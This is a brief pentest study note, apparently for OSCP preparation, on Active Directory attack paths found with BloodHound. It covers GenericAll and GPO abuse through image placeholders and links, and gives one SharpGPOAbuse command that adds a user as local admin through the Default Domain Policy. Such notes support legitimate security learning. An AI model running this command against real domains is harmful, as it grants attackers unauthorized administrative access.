// notes/ Active Directory
🏛️

Post Compromise Enumeration Bloodhound Attack Paths

<figure<img src="/files/c5N9LvI7TNu1nv1crbxK" alt=""<figcaption</figcaption</figure

#active directory#adot8
source · oscp.adot8.com · active-directory/post-compromise-enumeration_bloodhound_attack-paths

Attack Paths

GenericAll

<figure><img src="/files/c5N9LvI7TNu1nv1crbxK" alt=""><figcaption></figcaption></figure>

{% embed url="https://htb.adot8.com/hack-the-box/oscp-like-boxes/windows/support/priv-esc" %}

GPO Abuse

<figure><img src="/files/qwYoW4VRhBXDx0V8Fz0T" alt=""><figcaption></figcaption></figure> <figure><img src="/files/ES4c6juMV9zDlFd9WDA2" alt=""><figcaption></figcaption></figure>
code
01.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount charlotte --GPOName "Default Domain Policy"

{% embed url="https://bit-bandits.com/sharpgpoabuse.html" %}